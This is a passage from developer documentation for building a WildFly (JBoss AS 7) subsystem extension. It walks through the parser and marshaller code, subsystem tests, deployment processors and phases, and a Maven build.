addTypeOperation = new ModelNode();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 addTypeOperation.get(OP).set(ModelDescriptionConstants.ADD);\n\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 String suffix = null;\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 for (int i = 0; i < reader.getAttributeCount(); i++) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 String attr = reader.getAttributeLocalName(i);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 String value = reader.getAttributeValue(i);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (attr.equals(\"tick\")) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 TypeDefinition.TICK.parseAndSetParameter(value, addTypeOperation, reader);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } else if (attr.equals(\"suffix\")) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 suffix = value;\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } else {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 throw ParseUtils.unexpectedAttribute(reader, i);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ParseUtils.requireNoContent(reader);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (suffix == null) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 throw ParseUtils.missingRequiredElement(reader, Collections.singleton(\"suffix\"));\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/Add the 'add' operation for each 'type' child\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 PathAddress addr = PathAddress.pathAddress(SUBSYSTEM_PATH, PathElement.pathElement(TYPE, suffix));\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 addTypeOperation.get(OP_ADDR).set(addr.toModelNode());\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 list.add(addTypeOperation);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n ...\n----\n\nSo in the above we always create the add operation for our subsystem.\nDue to its address `\/subsystem=tracker` defined by `SUBSYSTEM_PATH` this\nwill trigger the `SubsystemAddHandler` we created earlier when we invoke\n`\/subsystem=tracker:add`. We then parse the child elements and create an\nadd operation for the child address for each `type` child. Since the\naddress will for example be `\/subsystem=tracker\/type=sar` (defined by\n`TYPE_PATH` ) and `TypeAddHandler` is registered for all `type`\nsubaddresses the `TypeAddHandler` will get invoked for those operations.\nNote that when we are parsing attribute `tick` we are using definition\nof attribute that we defined in TypeDefintion to parse attribute value\nand apply all rules that we specified for this attribute, this also\nenables us to property support expressions on attributes.\n\nThe parser is also used to marshal the model to xml whenever something\nmodifies the model, for which the entry point is the `writeContent()`\nmethod:\n\n[source,java,options=\"nowrap\"]\n----\nprivate static class SubsystemParser implements XMLStreamConstants, XMLElementReader<List<ModelNode>>, XMLElementWriter<SubsystemMarshallingContext> {\n ...\n \/** {@inheritDoc} *\/\n @Override\n public void writeContent(final XMLExtendedStreamWriter writer, final SubsystemMarshallingContext context) throws XMLStreamException {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/Write out the main subsystem element\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 context.startSubsystemElement(TrackerExtension.NAMESPACE, false);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 writer.writeStartElement(\"deployment-types\");\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ModelNode node = context.getModelNode();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ModelNode type = node.get(TYPE);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 for (Property property : type.asPropertyList()) {\n\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/write each child element to xml\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 writer.writeStartElement(\"deployment-type\");\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 writer.writeAttribute(\"suffix\", property.getName());\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ModelNode entry = property.getValue();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 TypeDefinition.TICK.marshallAsAttribute(entry, true, writer);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 writer.writeEndElement();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/End deployment-types\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 writer.writeEndElement();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/End subsystem\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 writer.writeEndElement();\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\n }\n----\n\nThen we have to implement the `SubsystemDescribeHandler` which\ntranslates the current state of the model into operations similar to the\nones created by the parser. The `SubsystemDescribeHandler` is only used\nwhen running in a managed domain, and is used when the host controller\nqueries the domain controller for the configuration of the profile used\nto start up each server. In our case the `SubsystemDescribeHandler` adds\nthe operation to add the subsystem and then adds the operation to add\neach `type` child. Since we are using ResourceDefinitinon for defining\nsubsystem all that is generated for us, but if you want to customize\nthat you can do it by implementing it like this.\n\n[source,java,options=\"nowrap\"]\n----\nprivate static class SubsystemDescribeHandler implements OperationStepHandler, DescriptionProvider {\n static final SubsystemDescribeHandler INSTANCE = new SubsystemDescribeHandler();\n\u00a0\n public void execute(OperationContext context, ModelNode operation) throws OperationFailedException {\n \/\/Add the main operation\n context.getResult().add(createAddSubsystemOperation());\n\u00a0\n \/\/Add the operations to create each child\n\u00a0\n ModelNode node = context.readModel(PathAddress.EMPTY_ADDRESS);\n for (Property property : node.get(\"type\").asPropertyList()) {\n\u00a0\n ModelNode addType = new ModelNode();\n addType.get(OP).set(ModelDescriptionConstants.ADD);\n PathAddress addr = PathAddress.pathAddress(SUBSYSTEM_PATH, PathElement.pathElement(\"type\", property.getName()));\n addType.get(OP_ADDR).set(addr.toModelNode());\n if (property.getValue().hasDefined(\"tick\")) {\n \u00a0TypeDefinition.TICK.validateAndSet(property,addType);\n }\n context.getResult().add(addType);\n }\n context.completeStep();\n }\n\u00a0\n\u00a0\n}\n----\n\n[[testing-the-parsers]]\n=== Testing the parsers\n\nChanges to tests between 7.0.0 and 7.0.1\n\n[NOTE]\n\nThe testing framework was moved from the archetype into the core JBoss\nAS 7 sources between JBoss AS 7.0.0 and JBoss AS 7.0.1, and has been\nimproved upon and is used internally for testing JBoss AS 7's\nsubsystems. The differences between the two versions is that in\n7.0.0.Final the testing framework is bundled with the code generated by\nthe archetype (in a sub-package of the package specified for your\nsubsystem, e.g. `com.acme.corp.tracker.support`), and the test extends\nthe `AbstractParsingTest` class.\n\nFrom 7.0.1 the testing framework is now brought in via the\n`org.jboss.as:jboss-as-subsystem-test` maven artifact, and the test's\nsuperclass is `org.jboss.as.subsystem.test.AbstractSubsystemTest`. The\nconcepts are the same but more and more functionality will be available\nas JBoss AS 7 is developed.\n\nNow that we have modified our parsers we need to update our tests to\nreflect the new model. There are currently three tests testing the basic\nfunctionality, something which is a lot easier to debug from your IDE\nbefore you plug it into the application server. We will talk about these\ntests in turn and they all live in\n`com.acme.corp.tracker.extension.SubsystemParsingTestCase`.\n`SubsystemParsingTestCase` extends `AbstractSubsystemTest` which does a\nlot of the setup for you and contains utility methods for verifying\nthings from your test. See the javadoc of that class for more\ninformation about the functionality available to you. And by all means\nfeel free to add more tests for your subsystem, here we are only testing\nfor the best case scenario while you will probably want to throw in a\nfew tests for edge cases.\n\nThe first test we need to modify is `testParseSubsystem()`. It tests\nthat the parsed xml becomes the expected operations that will be parsed\ninto the server, so let us tweak this test to match our subsystem. First\nwe tell the test to parse the xml into operations\n\n[source,xml,options=\"nowrap\"]\n----\n@Test\n public void testParseSubsystem() throws Exception {\n \/\/Parse the subsystem xml into operations\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n List<ModelNode> operations = super.parse(subsystemXml);\n----\n\nThere should be one operation for adding the subsystem itself and an\noperation for adding the `deployment-type`, so check we got two\noperations\n\n[source,java,options=\"nowrap\"]\n----\n\/\/\/Check that we have the expected number of operations\n Assert.assertEquals(2, operations.size());\n----\n\nNow check that the first operation is `add` for the address\n`\/subsystem=tracker`:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Check that each operation has the correct content\n \/\/The add subsystem operation will happen first\n ModelNode addSubsystem = operations.get(0);\n Assert.assertEquals(ADD, addSubsystem.get(OP).asString());\n PathAddress addr = PathAddress.pathAddress(addSubsystem.get(OP_ADDR));\n Assert.assertEquals(1, addr.size());\n PathElement element = addr.getElement(0);\n Assert.assertEquals(SUBSYSTEM, element.getKey());\n Assert.assertEquals(SubsystemExtension.SUBSYSTEM_NAME, element.getValue());\n----\n\nThen check that the second operation is `add` for the address\n`\/subsystem=tracker`, and that `12345` was picked up for the value of\nthe `tick` parameter:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Then we will get the add type operation\n ModelNode addType = operations.get(1);\n Assert.assertEquals(ADD, addType.get(OP).asString());\n Assert.assertEquals(12345, addType.get(\"tick\").asLong());\n addr = PathAddress.pathAddress(addType.get(OP_ADDR));\n Assert.assertEquals(2, addr.size());\n element = addr.getElement(0);\n Assert.assertEquals(SUBSYSTEM, element.getKey());\n Assert.assertEquals(SubsystemExtension.SUBSYSTEM_NAME, element.getValue());\n element = addr.getElement(1);\n Assert.assertEquals(\"type\", element.getKey());\n Assert.assertEquals(\"tst\", element.getValue());\n }\n----\n\nThe second test we need to modify is `testInstallIntoController()` which\ntests that the xml installs properly into the controller. In other words\nwe are making sure that the `add` operations we created earlier work\nproperly. First we create the xml and install it into the controller.\nBehind the scenes this will parse the xml into operations as we saw in\nthe last test, but it will also create a new controller and boot that up\nusing the created operations\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testInstallIntoController() throws Exception {\n \/\/Parse the subsystem xml and install into the controller\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices services = super.installInController(subsystemXml);\n----\n\nThe returned `KernelServices` allow us to execute operations on the\ncontroller, and to read the whole model.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Read the whole model and make sure it looks as expected\n ModelNode model = services.readWholeModel();\n \/\/Useful for debugging :-)\n \/\/System.out.println(model);\n----\n\nNow we make sure that the structure of the model within the controller\nhas the expected format and values\n\n[source,java,options=\"nowrap\"]\n----\nAssert.assertTrue(model.get(SUBSYSTEM).hasDefined(SubsystemExtension.SUBSYSTEM_NAME));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME).hasDefined(\"type\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\").hasDefined(\"tst\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\").hasDefined(\"tick\"));\n Assert.assertEquals(12345, model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\", \"tick\").asLong());\n }\n----\n\nThe last test provided is called `testParseAndMarshalModel()`. It's main\npurpose is to make sure that our `SubsystemParser.writeContent()` works\nas expected. This is achieved by starting a controller in the same way\nas before\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testParseAndMarshalModel() throws Exception {\n \/\/Parse the subsystem xml and install into the first controller\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices servicesA = super.installInController(subsystemXml);\n----\n\nNow we read the model and the xml that was persisted from the first\ncontroller, and use that xml to start a second controller\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Get the model and the persisted xml from the first controller\n ModelNode modelA = servicesA.readWholeModel();\n String marshalled = servicesA.getPersistedSubsystemXml();\n\u00a0\n \/\/Install the persisted xml from the first controller into a second controller\n KernelServices servicesB = super.installInController(marshalled);\n----\n\nFinally we read the model from the second controller, and make sure that\nthe models are identical by calling `compare()` on the test superclass.\n\n[source,java,options=\"nowrap\"]\n----\nModelNode modelB = servicesB.readWholeModel();\n\u00a0\n \/\/Make sure the models from the two controllers are identical\n super.compare(modelA, modelB);\n }\n----\n\nWe then have a test that needs no changing from what the archetype\nprovides us with. As we have seen before we start a controller\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testDescribeHandler() throws Exception {\n \/\/Parse the subsystem xml and install into the first controller\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \"<\/subsystem>\";\n KernelServices servicesA = super.installInController(subsystemXml);\n----\n\nWe then call `\/subsystem=tracker:describe` which outputs the subsystem\nas operations needed to reach the current state (Done by our\n`SubsystemDescribeHandler`)\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Get the model and the describe operations from the first controller\n ModelNode modelA = servicesA.readWholeModel();\n ModelNode describeOp = new ModelNode();\n describeOp.get(OP).set(DESCRIBE);\n describeOp.get(OP_ADDR).set(\n PathAddress.pathAddress(\n PathElement.pathElement(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME)).toModelNode());\n List<ModelNode> operations = super.checkResultAndGetContents(servicesA.executeOperation(describeOp)).asList();\n----\n\nThen we create a new controller using those operations\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Install the describe options from the first controller into a second controller\n KernelServices servicesB = super.installInController(operations);\n----\n\nAnd then we read the model from the second controller and make sure that\nthe two subsystems are identical +\nModelNode modelB = servicesB.readWholeModel();\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Make sure the models from the two controllers are identical\n super.compare(modelA, modelB);\n\u00a0\n }\n----\n\nTo test the removal of the the subsystem and child resources we modify\nthe `testSubsystemRemoval()` test provided by the archetype:\n\n[source,java,options=\"nowrap\"]\n----\n\/**\n * Tests that the subsystem can be removed\n *\/\n @Test\n public void testSubsystemRemoval() throws Exception {\n \/\/Parse the subsystem xml and install into the first controller\n----\n\nWe provide xml for the subsystem installing a child, which in turn\ninstalls a TrackerService\n\n[source,java,options=\"nowrap\"]\n----\nString subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices services = super.installInController(subsystemXml);\n----\n\nHaving installed the xml into the controller we make sure the\nTrackerService is there\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Sanity check to test the service for 'tst' was there\n services.getContainer().getRequiredService(TrackerService.createServiceName(\"tst\"));\n----\n\nThis call from the subsystem test harness will call remove for each\nlevel in our subsystem, children first and validate +\nthat the subsystem model is empty at the end.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Checks that the subsystem was removed from the model\n super.assertRemoveSubsystemResources(services);\n----\n\nFinally we check that all the services were removed by the remove\nhandlers\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Check that any services that were installed were removed here\n try {\n services.getContainer().getRequiredService(TrackerService.createServiceName(\"tst\"));\n Assert.fail(\"Should have removed services\");\n } catch (Exception expected) {\n }\n }\n----\n\nFor good measure let us throw in another test which adds a\n`deployment-type` and also changes its attribute at runtime. So first of\nall boot up the controller with the same xml we have been using so far\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testExecuteOperations() throws Exception {\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices services = super.installInController(subsystemXml);\n----\n\nNow create an operation which does the same as the following CLI command\n`\/subsystem=tracker\/type=foo:add(tick=1000)`\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Add another type\n PathAddress fooTypeAddr = PathAddress.pathAddress(\n PathElement.pathElement(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME),\n PathElement.pathElement(\"type\", \"foo\"));\n ModelNode addOp = new ModelNode();\n addOp.get(OP).set(ADD);\n addOp.get(OP_ADDR).set(fooTypeAddr.toModelNode());\n addOp.get(\"tick\").set(1000);\n----\n\nExecute the operation and make sure it was successful\n\n[source,java,options=\"nowrap\"]\n----\nModelNode result = services.executeOperation(addOp);\n Assert.assertEquals(SUCCESS, result.get(OUTCOME).asString());\n----\n\nRead the whole model and make sure that the original data is still there\n(i.e. the same as what was done by `testInstallIntoController()`\n\n[source,java,options=\"nowrap\"]\n----\nModelNode model = services.readWholeModel();\n Assert.assertTrue(model.get(SUBSYSTEM).hasDefined(SubsystemExtension.SUBSYSTEM_NAME));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME).hasDefined(\"type\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\").hasDefined(\"tst\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\").hasDefined(\"tick\"));\n Assert.assertEquals(12345, model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\", \"tick\").asLong());\n----\n\nThen make sure our new `type` has been added:\n\n[source,java,options=\"nowrap\"]\n----\nAssert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\").hasDefined(\"foo\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"foo\").hasDefined(\"tick\"));\n Assert.assertEquals(1000, model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"foo\", \"tick\").asLong());\n----\n\nThen we call `write-attribute` to change the `tick` value of\n`\/subsystem=tracker\/type=foo`:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Call write-attribute\n ModelNode writeOp = new ModelNode();\n writeOp.get(OP).set(WRITE_ATTRIBUTE_OPERATION);\n writeOp.get(OP_ADDR).set(fooTypeAddr.toModelNode());\n writeOp.get(NAME).set(\"tick\");\n writeOp.get(VALUE).set(3456);\n result = services.executeOperation(writeOp);\n Assert.assertEquals(SUCCESS, result.get(OUTCOME).asString());\n----\n\nTo give you exposure to other ways of doing things, now instead of\nreading the whole model to check the attribute, we call `read-attribute`\ninstead, and make sure it has the value we set it to.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Check that write attribute took effect, this time by calling read-attribute instead of reading the whole model\n ModelNode readOp = new ModelNode();\n readOp.get(OP).set(READ_ATTRIBUTE_OPERATION);\n readOp.get(OP_ADDR).set(fooTypeAddr.toModelNode());\n readOp.get(NAME).set(\"tick\");\n result = services.executeOperation(readOp);\n Assert.assertEquals(3456, checkResultAndGetContents(result).asLong());\n----\n\nSince each `type` installs its own copy of `TrackerService`, we get the\n`TrackerService` for `type=foo` from the service container exposed by\nthe kernel services and make sure it has the right value\n\n[source,java,options=\"nowrap\"]\n----\nTrackerService service = (TrackerService)services.getContainer().getService(TrackerService.createServiceName(\"foo\")).getValue();\n Assert.assertEquals(3456, service.getTick());\n }\n----\n\nTypeDefinition.TICK.\n\n[[add-the-deployers]]\n== Add the deployers\n\nWhen discussing `SubsystemAddHandler` we did not mention the work done\nto install the deployers, which is done in the following method:\n\n[source,java,options=\"nowrap\"]\n----\n @Override\n public void performBoottime(OperationContext context, ModelNode operation, ModelNode model,\n ServiceVerificationHandler verificationHandler, List<ServiceController<?>> newControllers)\n throws OperationFailedException {\n\u00a0\n log.info(\"Populating the model\");\n\u00a0\n \/\/Add deployment processors here\n \/\/Remove this if you don't need to hook into the deployers, or you can add as many as you like\n \/\/see SubDeploymentProcessor for explanation of the phases\n context.addStep(new AbstractDeploymentChainStep() {\n public void execute(DeploymentProcessorTarget processorTarget) {\n processorTarget.addDeploymentProcessor(SubsystemDeploymentProcessor.PHASE, SubsystemDeploymentProcessor.priority, new SubsystemDeploymentProcessor());\n\u00a0\n }\n }, OperationContext.Stage.RUNTIME);\n\u00a0\n }\n----\n\nThis adds an extra step which is responsible for installing deployment\nprocessors. You can add as many as you like, or avoid adding any all\ntogether depending on your needs. Each processor has a `Phase` and a\n`priority`. Phases are sequential, and a deployment passes through each\nphases deployment processors. The `priority` specifies where within a\nphase the processor appears. See `org.jboss.as.server.deployment.Phase`\nfor more information about phases.\n\nIn our case we are keeping it simple and staying with one deployment\nprocessor with the phase and priority created for us by the maven\narchetype. The phases will be explained in the next section. The\ndeployment processor is as follows:\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemDeploymentProcessor implements DeploymentUnitProcessor {\n ...\n\u00a0\n @Override\n public void deploy(DeploymentPhaseContext phaseContext) throws DeploymentUnitProcessingException {\n String name = phaseContext.getDeploymentUnit().getName();\n TrackerService service = getTrackerService(phaseContext.getServiceRegistry(), name);\n if (service != null) {\n ResourceRoot root = phaseContext.getDeploymentUnit().getAttachment(Attachments.DEPLOYMENT_ROOT);\n VirtualFile cool = root.getRoot().getChild(\"META-INF\/cool.txt\");\n service.addDeployment(name);\n if (cool.exists()) {\n service.addCoolDeployment(name);\n }\n }\n }\n\u00a0\n @Override\n public void undeploy(DeploymentUnit context) {\n context.getServiceRegistry();\n String name = context.getName();\n TrackerService service = getTrackerService(context.getServiceRegistry(), name);\n if (service != null) {\n service.removeDeployment(name);\n }\n }\n\u00a0\n private TrackerService getTrackerService(ServiceRegistry registry, String name) {\n int last = name.lastIndexOf(\".\");\n String suffix = name.substring(last + 1);\n ServiceController<?> container = registry.getService(TrackerService.createServiceName(suffix));\n if (container != null) {\n TrackerService service = (TrackerService)container.getValue();\n return service;\n }\n return null;\n }\n}\n----\n\nThe `deploy()` method is called when a deployment is being deployed. In\nthis case we look for the `TrackerService` instance for the service name\ncreated from the deployment's suffix. If there is one it means that we\nare meant to be tracking deployments with this suffix (i.e.\n`TypeAddHandler` was called for this suffix), and if we find one we add\nthe deployment's name to it. Similarly `undeploy()` is called when a\ndeployment is being undeployed, and if there is a `TrackerService`\ninstance for the deployment's suffix, we remove the deployment's name\nfrom it.\n\n[[deployment-phases-and-attachments]]\n=== Deployment phases and attachments\n\nThe code in the SubsystemDeploymentProcessor uses an _attachment_, which\nis the means of communication between the individual deployment\nprocessors. A deployment processor belonging to a phase may create an\nattachment which is then read further along the chain of deployment unit\nprocessors. In the above example we look for the\n`Attachments.DEPLOYMENT_ROOT` attachment, which is a view of the file\nstructure of the deployment unit put in place before the chain of\ndeployment unit processors is invoked.\n\nAs mentioned above, the deployment unit processors are organized in\nphases, and have a relative order within each phase. A deployment unit\npasses through all the deployment unit processors in that order. A\ndeployment unit processor may choose to take action or not depending on\nwhat attachments are available. Let's take a quick look at what the\ndeployment unit processors for in the phases described in\n`org.jboss.as.server.deployment.Phase`.\n\n[[structure]]\n==== STRUCTURE\n\nThe deployment unit processors in this phase determine the structure of\na deployment, and looks for sub deployments and metadata files.\n\n[[parse]]\n==== PARSE\n\nIn this phase the deployment unit processors parse the deployment\ndescriptors and build up the annotation index. `Class-Path` entries from\nthe META-INF\/MANIFEST.MF are added.\n\n[[dependencies]]\n==== DEPENDENCIES\n\nExtra class path dependencies are added. For example if deploying a\n`war` file, the commonly needed dependencies for a web application are\nadded.\n\n[[configure_module]]\n==== CONFIGURE_MODULE\n\nIn this phase the modular class loader for the deployment is created. No\nattempt should be made loading classes from the deployment until *after*\nthis phase.\n\n[[post_module]]\n==== POST_MODULE\n\nNow that our class loader has been constructed we have access to the\nclasses. In this stage deployment processors may use the\n`Attachments.REFLECTION_INDEX` attachment which is a deployment index\nused to obtain members of classes in the deployment, and to invoke upon\nthem, bypassing the inefficiencies of using `java.lang.reflect`\ndirectly.\n\n[[install]]\n==== INSTALL\n\nInstall new services coming from the deployment.\n\n[[cleanup]]\n==== CLEANUP\n\nAttachments put in place earlier in the deployment unit processor chain\nmay be removed here.\n\n[[integrate-with-wildfly]]\n== Integrate with WildFly\n\nNow that we have all the code needed for our subsystem, we can build our\nproject by running `mvn install`\n\n[source,options=\"nowrap\"]\n----\n[kabir ~\/sourcecontrol\/temp\/archetype-test\/acme-subsystem]\n$mvn install\n[INFO] Scanning for projects...\n[...]\nmain:\n [delete] Deleting: \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/null1004283288\n [delete] Deleting directory \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/module\n [copy] Copying 1 file to \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/module\/com\/acme\/corp\/tracker\/main\n [copy] Copying 1 file to \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/module\/com\/acme\/corp\/tracker\/main\n [echo] Module com.acme.corp.tracker has been created in the target\/module directory. Copy to your JBoss AS 7 installation.\n[INFO] Executed tasks\n[INFO]\n[INFO] --- maven-install-plugin:2.3.1:install (default-install) @ acme-subsystem ---\n[INFO] Installing \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/acme-subsystem.jar to \/Users\/kabir\/.m2\/repository\/com\/acme\/corp\/acme-subsystem\/1.0-SNAPSHOT\/acme-subsystem-1.0-SNAPSHOT.jar\n[INFO] Installing \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/pom.xml to \/Users\/kabir\/.m2\/repository\/com\/acme\/corp\/acme-subsystem\/1.0-SNAPSHOT\/acme-subsystem-1.0-SNAPSHOT.pom\n[INFO] ------------------------------------------------------------------------\n[INFO] BUILD SUCCESS\n[INFO] ------------------------------------------------------------------------\n[INFO] Total time: 5.851s\n[INFO] Finished at: Mon Jul 11 23:24:58 BST 2011\n[INFO] Final Memory: 7M\/81M\n[INFO] ------------------------------------------------------------------------\n----\n\nThis will have built our project and assembled a module for us that can\nbe used for installing it into WildFly. If you go to the `target\/module`\nfolder where you built the project you will see the module\n\n[source,options=\"nowrap\"]\n----\n$ls target\/module\/com\/acme\/corp\/tracker\/main\/\nacme-subsystem.jar module.xml\n----\n\nThe `module.xml` comes from 